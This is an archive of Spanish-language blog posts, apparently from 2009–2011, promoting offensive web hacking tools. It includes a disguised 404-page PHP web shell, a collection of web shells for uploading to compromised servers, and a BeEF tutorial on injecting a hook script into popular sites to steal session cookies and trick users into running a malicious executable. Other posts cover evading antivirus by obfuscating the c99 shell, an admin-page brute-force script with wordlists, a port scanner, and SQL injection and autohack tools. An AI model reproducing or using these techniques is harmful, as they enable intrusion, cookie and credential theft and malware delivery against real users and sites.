Mostrando entradas con la etiqueta Web T00LZ. Mostrar todas las entradas
Mostrando entradas con la etiqueta Web T00LZ. Mostrar todas las entradas

22 dic. 2011

[MySQL Password Auditor] Auditoría & Recuperación de Contraseñas MySQL


Desde SecurityXploded les traigo MysqlPasswordAuditor que es un programa gratuito de recuperación de contraseña de MySQL (uno de los software de bases de datos más potentes y utilizadas por la mayoría de las aplicaciones y servidores web).

MysqlPasswordAuditor ayuda a la recuperación de la contraseña de un servidor MySQL y puede ser usada para auditar bases de datos Mysql y descubrir contraseñas débiles.

MysqlPasswordAuditor es muy fácil de usar, con la simple diccionario, por fuerza bruta empieza a probar todas las contraseñas que estén en nuestro diccionario. Por defecto se incluye una lista de contraseñas de archivos pequeños, sin embargo pueden encontrar más diccionario con contraseñas aquí.

15 dic. 2011

[The Mole] Herramienta de Inyección SQL/SQLi Automatizada

Como regalo de navidad les traigo una de tantas herramientas para SQLi que existen, pero está me ha gustado bastante primero por que es de muy fácil uso y también por los métodos de petición que tiene.

The Mole es una herramienta de inyección SQL automatizada que mediante una URL vulnerable con su(s) respectivo(s) string(s) detectada y testeada en busca de vulnerabilidad SQLi, ya sea por método UNION o por consulta Booleana.

Características:
  • Soporta inyecciones a MySQL, SQL Server, PostgreSQL & Oracle.
  • Soporta linea de comandos. Diferente comando producen diferentes respuestas.
  • Auto-completación de los comandos, argumentos de comandos y los nombres de base de datos, tabla y las columnas.
  • Soporte pata filtros de consulta, para bypass IPS/IDS.
  • Explota inyecciones SQL a través de métodos GET y POST.
  • Desarrollada en python3.

13 dic. 2011

[Shell PHP] Error 404 Privada


Los chicos de www.subhashdasyam.com han hecho una Shell en PHP que la he encontrado bastante ingeniosa, útil y me ha gustado mucho. No necesita una ser detallada muy a fondo, ya que es como una Shell normal, solo que cuando uno intenta acceder aparece el clásico Error 404 - Not Found, pero tiene un  casilla secreta donde puedes poner una contraseña para acceder.

La contraseña por defecto es HACKED pero la pueden cambiar modificando la linea 4 en donde tienen que cambiar el hash MD5 que aparece por el hash MD5 de la contraseña que ustedes consideren.

26 mar. 2011

[Videos] Demostraciones sobre Ataques Web

Estas presentaciones creadas por Webattack (@artsweb) hacen referencia a los ataques más comunes sobre las aplicaciones Web.La idea principal es concientar a los desarrolladores/administradores, para que tengan en cuenta a qué amenazas y riesgos de seguridad están expuestas sus aplicaciones.

Todas las demostraciones han sido desarrolladas utilizando la aplicacion DVWA y es importante señalar que existen más ataques, los cuales no figuran en la presentación.

En esta Web existe también una presentación en cual se explica con un poco más detalle los tipos de ataques (XSS, CSRF, Path Traversal, Null Byte, OS Commanding ,Local File Inclusion, Remote File Inclusion, Information Disclosure, SQL Injection/Blind SQL Injection, File Upload) que pondré en video aquí:

Presentación "Documentación – Web Attack" (*.PPT)

11 mar. 2011

46 shells

Bueno... estaba revisando mi computador antes de formatearlo y me encuentro con una cantidad impresionante de Shells que había coleccionado a lo largo del tiempo, así que he decido postearlas ya que todavía son muy usadas al momento de tener acceso a un servidor. Es muy típico como deporte encontrar sitios webs vulnerables y subir la Sheel sin un fin claro...


Quizás también les pueda interesar a aquellos que quieran emprender el camino de programar su propia shell y así buscar funciones en este montón de shells...

21 dic. 2010

[D0z.me Please] Un acortador de URL que genera DDoS

Si bien esto no es un concepto nuevo ni se trata de una herramienta sofisticada, es conceptualmente interesante, ya que sólo requiere un navegador para ejecutar una parte de un ataque DoS y todo lo que se requiere es tener activado Javascript para que funcione en los navegadores de los participantes.

Con eso en mente un estudiante de la Universidad de Tulsa creo D0z.me, una Prueba de Concepto (PoC) de un acortador de URL que, además de ofrecer ese servicio, ataca (secretamente) a un servidor arbitrario. El autor también ha publicado el código fuente de la herramienta.

6 may. 2010

[BeEF] Tutorial

Bueno, hace algún tiempo publique información sobre BeEF: [BeEFYPROXY] Interceptar el trafico WEB (MITM) ahora les traigo un tutorial que encontré y que es bastante bueno, lo recomiendo 100%:


INICIEMOS

1- Descargamos BeEF de Su pagina oficial
http://www.bindshell.net/tools/beef/

2- Desempaquetamos.....

3-En un Hosting montamos los Archivos...Cuando acabemos vamos a la GUI:

¿Una Vez Montado como saber si funciona?


Simple Nos Ponemos en la GUI :D

Y vamos al MENU VIEW Y ELEGIMOS LA 1 OPCIÓN

Este Nos Brindara una ventana de EXAMPLE O PRUEBA si vemos que Al cabo de unos Segundos Conecta...

Quiere decir que Nuestro BeEF esta Listo :D!!!


¿COMO USARLO?

Bueno vamos al menú que Nombre anteriormente VIEW/Spawn Zombie Example

Nos saldrá esta pag:

Dicho código es un ARCHIVO SCRIPT que se encuentra en los archivos que nosotros subimos con el BEEF!

<script language='Javascript' src="http://          /beef/hook/beefmagic.js.php'></script>

Ese Code Hay que Meterlo en el Body de las Páginas.. Su función sería crear un Puente...Se preguntan en que Páginas¿?... en las que Quieran...!!! EJEMPLO!... si logran meter el SCRIPT CODE en alguna pagina con usuarios EJEMPLO: facebook.com XD podrías robar SESIONES COOKIES.. Ademas Podrías meterlo en varias webs FAMOSAS CON MUCHA VISITAS y a los users los Rediriges a un EXE y así Podrías tener un Malware Infeccion

Mentiendo el Code en un INDEX de un Hacked HOST!

Este Code hará una simulación de quw la web esta Cargando... y A la vez Conecta al BEEF CLIENT.







En Nuestro Client BEEF Veríamos esto....

1 ZOMBIE A CONECTADO :D
  • Podriamos Robar Cookies
  • Sacar IPS
  • Enviar Alerts!
  • Java Applet!
  • Entre otras Funciones.....
Enviando Alerts

1- VISTA DESDE EL CLIENT MANAGER

2-VISTA DESDE LA WEB Q RECIBE

Haciendo redireccion a Archivo Exe Mediante ING SOCIAL!


1- Enviamos AlerT al usuario con algo q haga descarga

EJEMPLO: "Para Ver la Página Necesita tener Adobe reader 3"

El usuario dira Bueno lo Descargo de una....


2- Le hacemos un redirect a Un Archivo.exe Simulando ser el Adobe Reader 3

a- Vamos a NETWORK MODULES/ BROWSER REDIRECT

b- Ingresamos el enlace con el .exe MALICIOSO

c- Al abrirse el usuario creera q es el ADOBE q se le pidio anteriormente... y PFF

Fuente: http://maztor.diosdelared.com/

[+] Salu2

16 abr. 2010

[BeEFYPROXY] Interceptar el trafico WEB (MITM)



BeEFYPROXY es la unión de dos scripts que juntos permiten interceptar y re-enviar contenido modificado de sitios verdaderos aparentando ser el sitio original. Se requiere de apuntar los dominios al IP donde esta hosteado BeEFYPROXY.BeEFYPROXY esta diseñado para correr en un hosting dedicado para que la dirección IP muestre la pagina default de BeEFYPROXY.Se recibe una conexión a la dirección IP y el script toma el valor de la cabecera Host y obtiene la pagina del Host verdadero y agrega el script del cliente BeEF.

Instalación
  • Descomprime el contenido de beefproxy en /
  • Apunta cualquier dominio a la IP donde esta hosteado BeEFYPROXY y este se conecta al Host indicado, obtiene la pagina real, le agrega el script de BeEF y muestra el contenido al usuario como si fuera la pagina del dominio verdadero.
Funciones
  1. MITM con modificación de contenido
  2. Redirige el contenido actual del dominio verdadero
  3. Agrega el Framework BeEF (accesible en /beef.php) que incluye:
    • Keylog en tiempo real
    • Almacena Cookies, Keylog y HTML en /cache (ver por ftp)
    • muchas mas funciones (ver http://www.bindshell.net/tools/beef)
 Como esta hecho?

Junte BeEF (http://www.bindshell.net/tools/beef) y PHProxy (http://sourceforge.net/projects/poxy) en un solo archivo. Cambie de nombre el index.php de BeEF por beef.php y puse el index.php de PHProxy modificado.En PHProxy cambie la variable $_url_form (ln 1142) que era la barra de navegación del proxy por el url default del script de BeEF: /hook/beefmagic.js.php y le modifique su label al principio del archivo.Tambien agrege en la ln 417 una función para que cuando se recibe una petición sin variable 'q' por GET, se tome como url default el Host con el que se hace la petición.
Descargar BeEFYPROXY

Web oficial: http://www.hakim.ws/software/beefyproxy/
Más Info: http://www.bindshell.net/tools/beef

[+] ZioneR

14 abr. 2010

[WebRaider] Explotación automatizada de aplicaciones Web

WebRaider es una herramienta para buscar y explotar vulnerabilidades de forma automatizada en aplicaciones web,  que se centra en la explotación de las aplicaciones web.

webraider1 WebRaider   Explotación automatizada de aplicaciones 
Web

La idea es simple, obtener una shell inversa o  de una inyección de SQL y una petición sin necesidad de utilizar un canal extra como TFTP, FTP para subir la carga inicial.
Las características de esta herramienta son las siguientes:

  • Realiza solo una solicitud, por lo tanto es mas rápido
  • No es necesario ninguna herramienta, se puede simplemente utilizar el navegador o un sencillo proxy MITM
  • Solo tienes que copiar y pegar el payload
  • Es posible diseñar un ataque CSRF para que nos devuelva una shell inversa
  • El payload no ocupa mas de 3500 caracteres
  • No son necesarias aplicaciones del sistema como FTP, TFTP o Debug.exe
  • Fácil de automatizar

Aquí les dejo la presentación de la herramienta:



De momento WebRaider solo funciona en entornos Microsoft Windows, pero al tener a la mano el código fuente no creo que tarden mucho en hacerlo correr para cualquier GNU Linux o Mac OS X utilizando WINE.

Descargar WebRaider Herramienta para explotación automatizadas en aplicaciones web



Fuente: http://www.dragonjar.org/

8 oct. 2009

Inicia Linux desde Internet con boot.kernel.org

En Kernel.org hicieron algo que puede dejar a tus Live CD de Linux en el olvido, ya que desde ahora puedes iniciar un sistema operativo Linux desde Internet sin necesidad de descargar un CD completo.
Como podrás ver en boot.kernel.org (BKO), el concepto es bastante simple: descarga un pequeño archivo de inicio, quémalo en un CD, USB o diskette, inicia con él y automáticamente el resto del sistema será descargado desde internet.

La idea no es tan nueva ni tirada de las mechas. Desde hace años que un sistema operativo Linux se puede iniciar desde una red, pero tal uso sólo era práctico en redes locales, y ésto requería configurar un servidor propio que alojara los archivos necesarios para que se inicie el sistema. Ahora con este nuevo mecanismo, los muchachos de BKO son quienes se encargan de dejar el sistema disponible, y el usuario sólo necesita quemar su archivo de inicio.


El archivo de inicio es de sólo 200KB para USB y Floppy, y unos 500KB en su versión CD.  Lo recomendable es usar la opción USB ya que eso permitirá grabar información en el mismo disco.

¿Para qué puede servir? Además de ser algo en sí mismo entretenido para cualquier geek, el hecho de que se pueda seleccionar qué distribución de Linux se va a iniciar permite probarlas sin tener que descargar un disco completo.  Entre las distribuciones de Linux disponibles en BKO también podemos encontrar algunas orientadas a rescatar sistemas, algo que incluso puede servir a los usuarios de Windows en caso de que su sistema no quiera iniciar, o se encuentren con un sistema de archivos NTFS corrupto (Been there, done that).

En este momento se pueden encontrar las mencionadas herramientas de rescate y las distribuciones Debian, Ubuntu 9.04, Damn Small Linux, Knoppix 5.0.1 y Fedora 11.

Y no, no esperes que tu sistema se inicie en sólo 5 segundos como ya lo está haciendo Ubuntu con discos SSD. El tiempo será tan bueno como tu conexión a Internet, y el soporte de hardware como siempre depende de cada distribución.

Link: boot.kernel.org

26 sept. 2009

Encontrar Admin de una Web (2 métodos)

De la mano de hacking-avanzado.blogspot.com nos enseña como encontrar la página del administrador de una web usando el script admin-scan.py ya posteado anteriormente aquí, pero lo interesente no es ese método sino el segundo, el de encontrar el admin por medio de robots.txt que yo por lo menos no conocía.

PEN-TESTING: ENCONTRAR LA PAGINA DE ADMINISTRACIÓN DE UNA WEB

Algunas veces sucede que podemos encontrar una vulnerabilidad de sql-injection y, a simple vista, no hay quien vea dónde se encuentra la página de loggin del admin, por lo que no podemos terminar de reventar la página. Es aquí donde el siguiente script, bajado de darkc0de, resulta útil:


#/usr/bin/python
import sys, os, time, httplib

if sys.platform == 'linux' or sys.platform == 'linux2':
clearing = 'clear'
else:
clearing = 'cls'
os.system(clearing)


if len(sys.argv) != 2:
print "\n|---------------------------------------------------------------|"
print "| b4ltazar[@]gmail[dot]com                                      |"
print "|   03/2009     Admin login finder     v2.0                     |"
print "| Help: admin-find.py -h                                        |"
print "| Visit www.darkc0de.com and www.ljuska.org                     |"
print "|---------------------------------------------------------------|\n"
sys.exit(1)

for arg in sys.argv:
if arg == '-h':
print "\n|-------------------------------------------------------------------------------|"
print "| b4ltazar[@]gmail[dot]com                                                      |"
print "|   03/2009      Admin login finder     v2.0                                    |"
print "| Usage: admin-find.py www.site.com                                             |"
print "| Example: admin-find.py site.com                                               |"
print "| Visit www.darkc0de.com and www.ljuska.org                                     |"
print "|-------------------------------------------------------------------------------|\n"
sys.exit(1)



site = sys.argv[1].replace("http://","").rsplit("/",1)[0] 
site = site.lower()

admin_path = ['admin.php','admin/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/','memberadmin/','administratorlogin/','adm/','admin/account.php','admin/index.php','admin/login.php','admin/admin.php','admin/account.php','joomla/administrator','login.php',
'admin_area/admin.php','admin_area/login.php','siteadmin/login.php','siteadmin/index.php','siteadmin/login.html','admin/account.html','admin/index.html','admin/login.html','admin/admin.html','admin_area/index.php','bb-admin/index.php','bb-admin/login.php','bb-admin/admin.php','admin/home.php','admin_area/login.html','admin_area/index.html','admin/controlpanel.php','admincp/index.asp','admincp/login.asp','admincp/index.html','admin/account.html','adminpanel.html','webadmin.html','webadmin/index.html','webadmin/admin.html','webadmin/login.html','admin/admin_login.html','admin_login.html','panel-administracion/login.html','admin/cp.php','cp.php','administrator/index.php','administrator/login.php','nsw/admin/login.php','webadmin/login.php','admin/admin_login.php','admin_login.php','administrator/account.php','administrator.php','admin_area/admin.html','pages/admin/admin-login.php','admin/admin-login.php','admin-login.php','bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','modelsearch/login.php','moderator.php','moderator/login.php','moderator/admin.php','account.php','pages/admin/admin-login.html','admin/admin-login.html','admin-login.html','controlpanel.php','admincontrol.php',
'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','rcjakar/admin/login.php','adminarea/index.html','adminarea/admin.html','webadmin.php','webadmin/index.php','webadmin/admin.php','admin/controlpanel.html','admin.html','admin/cp.html','cp.html','adminpanel.php','moderator.html','administrator/index.html','administrator/login.html','user.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html','moderator/login.html','adminarea/login.html','panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html','admincontrol/login.html','adm/index.html','adm.html','moderator/admin.html','user.php','account.html','controlpanel.html','admincontrol.html','panel-administracion/login.php','wp-login.php','adminLogin.php','admin/adminLogin.php','home.php','adminarea/index.php','adminarea/admin.php','adminarea/login.php','panel-administracion/index.php','panel-administracion/admin.php','modelsearch/index.php','modelsearch/admin.php','admincontrol/login.php','adm/admloginuser.php','admloginuser.php','admin2.php','admin2/login.php','admin2/index.php','adm/index.php','adm.php','affiliate.php','adm_auth.php','memberadmin.php','administratorlogin.php','administrador/']


print "\n|---------------------------------------------------------------|"
print "| b4ltazar[@]gmail[dot]com                                      |"
print "|   03/2009      Admin login finder     v2.0                    |"
print "| Visit www.darkc0de.com and www.ljuska.org                     |"
print "|---------------------------------------------------------------|\n"
print "\n[-] %s" % time.strftime("%X")

print "[+] Target:",site
print "[+] Checking paths..."
print


try:
for admin in admin_path:
admin = admin.replace("\n","")
admin = "/" + admin
connection = httplib.HTTPConnection(site)
connection.request("GET",admin)
response = connection.getresponse()
print "%s %s %s" % (admin, response.status, response.reason)
except(KeyboardInterrupt,SystemExit):
raise
except:
pass 


El script lo único que hace es pedir un montón de páginas que podrían ser la que buscamos, por ejemplo /admin/ y /administrador/ y sacar el return code. Si vemos un 200 es que hemos encontrado lo que buscamos. Un poco primitivo, pero eficiente. Al final de la lista de url's a intentar, he añadido "administrador", porque estos scripts suelen obviar el idioma español.

Lo ejecutamos así:
python adminfinder.py http://www.victima.es/ |grep -v 404

Y el resultado es éste:

Todos los NOT FOUND han sido redirigidos a la página de error, por eso da un 301. Pero, si os fijáis, ha encontrado /administrator/, que es la página de loggin del admin.

Además de este script, y como un recurso adicional, podemos echarle un ojo al archivo robots.txt, porque a veces los admins se olvidan de borrar los directorios que aparecen por defecto.En este caso, si vemos robots.txt nos encontramos esto:

User-agent: * Disallow: /administrator/ Disallow: /cache/ Disallow: /components/ [...]

Entre los directorios listados podemos encontrar de nuevo /administrator/

Script original aquí.

Fuente: http://hacking-avanzado.blogspot.com/

7 sept. 2009

Ofuscar una Shell (PHP)

En el presente se mostrará como ofuscar una shell en php y saltarnos el antivirus.

De nuevo, vamos a poder comprobar que los antivirus no son capaces de hacer mucho más que comparar con firmas (hashes). Cualquier mínimo nivel de ofuscación se los salta.

En esta "práctica", lo que haremos es subir a virustotal, un conocido servicio de antivirus online, la shell c99.txt, que podría decirse es la más típica shell en php. La subiremos, analizaremos, ofuscaremos y volveremos a subir y analizar. Y el resultado es ... el que todos esperamos. Los siguientes pantallazos ilustran el experimento.

En primer lugar, subimos la shell a virustotal. Por supuesto, casi todos los antivirus la detectan.



Una vez comprobado esto, copiamos el código de la shell y la subimos a codeeclipse, que tiene un servicio online de ofuscación de código php. El proceso es muy sencillo, tal y como vemos a continuación:







Finalmente, subimos la shell ofuscada a virustotal, y ...



Seguramente, cambiando los nombres de las funciones que se llaman c99xxx tendríamos que nuestra shell es totalmente indetectable para los antivirus. De hecho, además de con c99, he probado con otra shell menos conocida y virustotal no la ha detectado tras ofuscarla.

Fuente: http://hacking-avanzado.blogspot.com/

6 sept. 2009

Manual Joomla

Joomla! está calificada como C.M.S o Content Management System, sistema de administración de contenidos y entre sus principales virtudes permite editar el contenido de un sitio web de manera sencilla. Es una aplicación de código abierto construida mayoritariamente en PHP bajo una licencia GPL. Este administrador de contenidos puede trabajar en Internet o intranets y requiere de una base de datos MySQL, así como preferiblemente, de un servidor HTTP Apache.

Aquí un buen tutorial para esta herramienta (sistema de administración web) que está bastante completo para quienes no conocen nada de Joomla o para los principiantes. Sin duda lectura obligatoria para los administradores web.

Descarga (Directa)
Descarga MEGAUPLOAD
Descarga RapidShare

Fuente: http://www.lpmagazine.org/
Autor: Sergio Viteri

1 sept. 2009

VHoster: Consultar los dominios virtuales alojados en una misma IP


Vhoster es la versión gráfica de "rwhois", el script que publicamos para consultar los dominios virtuales que se encontraban alojados en una misma dirección IP utilizando el servicio de Live.com

La utilidad, que ha sido desarrollada por Dani Kachakil, tiene por objetivo identificar el mayor número posible de vías de entrada en un sistema.

En el transcurso de una auditoría puede ocurrir que se encuentre un desarrollo bien formulado y por lo tanto con muy pocas vulnerabilidades. El problema viene dado al compartir alojamiento con otros aplicativos infectados y débiles. Esto se agrava si no se puede gestionar esas aplicaciones por que, por ejemplo, son de otra compañía. La situación es común en empresas de tamaño medio que necesitan costes bajos para mantener sus servicios.

Para utilizar Vhoster, tan solo hay que ejecutar la aplicación, introducir la web y pulsar sobre "Search", rápidamente mostrará los resultados obtenidos en el cuadro de la izquierda.

Mediante la opción "Check DNS", se tratará de evitar falsos positivos (y hackeos colaterales), comprobando cada uno de los dominios que reporta Live, ya que en algunas ocasiones esta información es obsoleta y no se corresponde con la realidad. Los fallos encontrados se muestran y contabilizan en la tabla de la derecha.



Descarga de Vhoster v1.0

Fuente:  http://www.securitybydefault.com/

29 ago. 2009

httprecon, Identificación de Servidores Web

Aunque el término original del artículo es Fingerprinting, que traducido literalmente es “toma de huellas digitales”, he preferido darle la interpretación de Identificación Avanzada, ya que el objetivo principal de la herramienta es identificar en un alto porcentaje el servidor web que gestiona una página Web objetivo.
El proyecto httprecon investiga en el campo del Fingerprinting Web, tarea que exige identificar de manera casi exacta el servidor Web de una página en específico u objeto de análisis. Tema de especial importancia para análisis profesionales y detección de vulnerabilidades Web.
Además de la exactitud de los resultados de los análisis, la herramienta cuenta con varios recursos informátivos que ofrecen metodologías para llevar a cabo este tipo de identificaciones.
La herramienta mejorará y hará más eficiente el proceso de enumeración e identificación de objetivos, mediante técnicas de identificación de banners, estado del código y encabezados.

Está programado en VisualBasic 6 y es de código abierto, además de que se pueden ver los datos que utiliza.

Links:
FAQ
Documentación de la herramienta httprecon
Descargar la herramienta httprecon
Web oficial del proyecto httprecon
Más información (fuente) de la herramienta httprecon (inglés)


En resumen: httprecon es un programa para Windows que permite analizar e identificar que servidor http esta corriendo un objetivo. Analiza los banners, códigos de error devueltos, el orden de las cabeceras, etc.

Fuentes:
http://www.dragonjar.org/
http://0verl0ad.blogspot.com/

Scripts en Perl y Python para buscar mediante fuerza bruta páginas de login

Scripts escritos en Python y Perl para realizar ataques de fuerza bruta con el objetivo de averiguar las URL de acceso al panel de administración de un determinado sitio web (Admin Page Finder).

Servicios en Linea:
http://mormoroth.net/af/
http://4dm1n.houbysoft.com/ (Código fuente disponible)

Script en Python

Descargar Admin-scan.py

Sintaxis de uso:
$ python admin-scan.py IP/Dcominio


Ejemplo:
/wp-login.php 404 Not Found
/admin.php 200 OK <------------------- 
/admin/ 404 Not Found 
/administrator/ 404 Not Found 
/moderator/ 404 Not Found


NOTA: Para personalizar la lista de rutas que utiliza el script debemos editar la variable "admin_path" del script.

Script en Perl

El script "Jasakomtool.pl" además de ataques de fuerza bruta para conseguir ubicar la página de acceso a la administración de una determinada web, permite realizar sencillos escaneos de puerto y obtener información mediante "banner grabbing" de los servicios Ftp,Ssh, Telnet, Smtp,Http,Pop3 y Mysql.

Descargar Jasakomtool.pl

Búsqueda mediante fuerza bruta la página de administración de la web (Login page)

Se debe tener en la misma ruta del script un fichero "admin.txt" con las rutas que nos interese.

Sintaxis:
$ perl jasakomtool.pl -admin Dominio/IP Puerto_inicial Puerto_final


Ejemplo:
$ perl jasakomtool.pl -admin http://www.dominio.com

Guessing Admin login page of http://www.dominio.com:
-----------------------------------------
Testing for url:http://www.dominio.com/admin1.php Result:404 Not Found
Testing for url:http://www.dominio.com/admin1.html Result:404 Not Found
Testing for url:http://www.dominio.com/admin2.php Result:404 Not Found
Testing for url:http://www.dominio.com/admin2.html Result:404 Not Found
Testing for url:http://www.dominio.com/wp-login.php Result:200 OK <------------------ ## :-)
Testing for url:http://www.dominio.com/yonetim.php Result:404 Not Found
Testing for url:http://www.dominio.com/yonetim.html Result:404 Not Found
Testing for url:http://www.dominio.com/yonetici.php Result:404 Not Found


Escaneo de puertos:

Sintaxis:
$ perl jasakomtool.pl -portscan Dominio/IP Puerto_inicial Puerto_final


Ejemplo:
$ perl jasakomtool.pl -portscan www.dominio.com 21 110

Scanning open ports on www.dominio.com from port 21 s/d 110
____________________________________________________________________
Port 21 on www.dominio.com is open !!! w00t !
Port 22 on www.dominio.com is open !!! w00t !
Port 25 on www.dominio.com is open !!! w00t !
Port 53 on www.dominio.com is open !!! w00t !
Port 80 on www.dominio.com is open !!! w00t !
Port 106 on www.dominio.com is open !!! w00t !
Port 110 on www.dominio.com is open !!! w00t !
____________________________________________________________________
Not Shown: 82 closed ports on www.dominio.com from port 21 until 110


Obteniendo información (Banner grabbing)

Busca las versiones de las aplicaciones Ftp,Ssh, Telnet, Smtp,Http,Pop3 y Mysql mediante Banner grabbing (Conectando al puerto y obteniendo el banner que muestre el servicio). Podemos usar la IP o el dominio del servidor a escanear.

Sintaxis / Ejemplo:
$ perl jasakomtool.pl -getinfo www.dominio.com
Daemon informations from common ports: 21,22,23,25,80,110 and 3306:

Daemon response (info) from port 21 (ftp daemon):
220 ProFTPD 1.3.1 Server (ProFTPD) [89.18.229.113]
_______________________________________________
Daemon response (info) from port 22 (ssh daemon):
SSH-2.0-OpenSSH_4.3
_______________________________________________
Daemon response (info) from port 25 (smtp daemon):
220 srv01.seidonet.com ESMTP
_______________________________________________
Daemon response (info) from port 80 (httpd):
Apache/2.2.3 (CentOS) Server at default Port 80

Important! You can see informations such as: web server version,ssl version,php version,perl version
_______________________________________________
Daemon response (info) from port 110 (pop3 server):
+OK Hello there. <30240.1246322027@localhost.localdomain>
_______________________________________________
Daemon response (info) from port 3306 (mysql daemon):
4
5.0.22FKZE)=7:^K,<*]w]NLt#OFN


Fichero: admin.txt
admin1.php
admin1.html
admin2.php
admin2.html
yonetim.php
yonetim.html
yonetici.php
yonetici.html
ccms/
ccms/login.php
ccms/index.php
maintenance/
webmaster/
adm/
configuration/
configure/
websvn/
admin/
admin/account.php
admin/account.html
admin/index.php
admin/index.html
admin/login.php
admin/login.html
admin/home.php
admin/controlpanel.html
admin/controlpanel.php
admin.php
admin.html
admin/cp.php
admin/cp.html
cp.php
cp.html
administrator/
administrator/index.html
administrator/index.php
administrator/login.html
administrator/login.php
administrator/account.html
administrator/account.php
administrator.php
administrator.html
login.php
login.html
modelsearch/login.php
moderator.php
moderator.html
moderator/login.php
moderator/login.html
moderator/admin.php
moderator/admin.html
moderator/
account.php
account.html
controlpanel/
controlpanel.php
controlpanel.html
admincontrol.php
admincontrol.html
adminpanel.php
adminpanel.html
admin1.asp
admin2.asp
yonetim.asp
yonetici.asp
admin/account.asp
admin/index.asp
admin/login.asp
admin/home.asp
admin/controlpanel.asp
admin.asp
admin/cp.asp
cp.asp
administrator/index.asp
administrator/login.asp
administrator/account.asp
administrator.asp
login.asp
modelsearch/login.asp
moderator.asp
moderator/login.asp
moderator/admin.asp
account.asp
controlpanel.asp
admincontrol.asp
adminpanel.asp
fileadmin/
fileadmin.php
fileadmin.asp
fileadmin.html
administration/
administration.php
administration.html
sysadmin.php
sysadmin.html
phpmyadmin/
myadmin/
sysadmin.asp
sysadmin/
ur-admin.asp
ur-admin.php
ur-admin.html
ur-admin/
Server.php
Server.html
Server.asp
Server/
wp-admin/
administr8.php
administr8.html
administr8/
administr8.asp
webadmin/
webadmin.php
webadmin.asp
webadmin.html
administratie/
admins/
admins.php
admins.asp
admins.html
administrivia/
Database_Administration/
WebAdmin/
useradmin/
sysadmins/
admin1/
system-administration/
administrators/
pgadmin/
directadmin/
staradmin/
ServerAdministrator/
SysAdmin/
administer/
LiveUser_Admin/
sys-admin/
typo3/
panel/
cpanel/
cPanel/
cpanel_file/
platz_login/
rcLogin/
blogindex/
formslogin/
autologin/
support_login/
meta_login/
manuallogin/
simpleLogin/
loginflat/
utility_login/
showlogin/
memlogin/
members/
login-redirect/
sub-login/
wp-login/
login1/
dir-login/
login_db/
xlogin/
smblogin/
customer_login/
UserLogin/
login-us/
acct_login/
admin_area/
bigadmin/
project-admins/
phppgadmin/
pureadmin/
sql-admin/
radmind/
openvpnadmin/
wizmysqladmin/
vadmind/
ezsqliteadmin/
hpwebjetadmin/
newsadmin/
adminpro/
Lotus_Domino_Admin/
bbadmin/
vmailadmin/
Indy_admin/
ccp14admin/
irc-macadmin/
banneradmin/
sshadmin/
phpldapadmin/
macadmin/
administratoraccounts/
admin4_account/
admin4_colon/
radmind-1/
Super-Admin/
AdminTools/
cmsadmin/
SysAdmin2/
globes_admin/
cadmins/
phpSQLiteAdmin/
navSiteAdmin/
server_admin_small/
logo_sysadmin/
server/
database_administration/
power_user/
system_administration/
ss_vms_admin_sm/


Fuente: http://www.busindre.com/

25 ago. 2009

winAUTOPWN: framework de exploits

Ahora puedes dormir ??? (NOW YOU CAN SLEEP)... Sí, ese es el lema de la herramienta winAUTOPWN que es un framework de exploits.

Ahora... que es un framework ???
"Un framework, es una estructura de soporte definida, mediante la cual otro proyecto de software puede ser organizado y desarrollado. Típicamente, puede incluir soporte de progrmas, bibliotecas y un lenguaje interpretado entre otros software para ayudar a desarrollar y unir los diferentes componentes de un proyecto."
Osea, es un interprete y biblioteca (compilado) de exploits... Ahora lo interesante de este framework es que promete mucho, una de sus características más notables es el AutoHack.
Ahora unas pequeñas características:
  • AutoHack a tus objetivos con la menor interacción posible.
  • Contiene ya personalizados y compilados exploits.
  • No hay necesidad de modificar o compilar el código fuente de los exploits.
  • Escanea todos los puertos del 1 al 65535 después de tomar la dirección IP y prueba todos los exploits posibles de acuerdo a la lista de los puertos abiertos en (OpenPorts.TXT)
  • Puede ser utilizado también para probar la eficacia de IDS / IPS
  • Corre los exploits de manera independientes y no requiere de registrarse.
  • Es Gratis y de código libre !!!
  • Se actualiza muy a seguido.
"El objetivo de la creación de winAUTOPWN no es competir con los ya exitentes frameworks como, Core Impact (Pro), Immunity Canvas, Metasploit Framework (freeware), etc. quien ofrece mejor autohacks, sino para crear un país libre, rápido, aplicación independiente que es fácil de uso y no requiere de mucho apoyo de otras dependencias."

Requisitos para usar el WinAUTOPWN:
  • Tener instalado Interprete Perl, PHP, Python.
  • Y algunos archivos DLL de Cygwin especificados en el Readme.
Screenshoots:




Sitio Oficial:
http://winautopwn.co.nr/
Zona Descarga:
http://118.94.162.244/w/Downloads.html


Salu2
ZioneR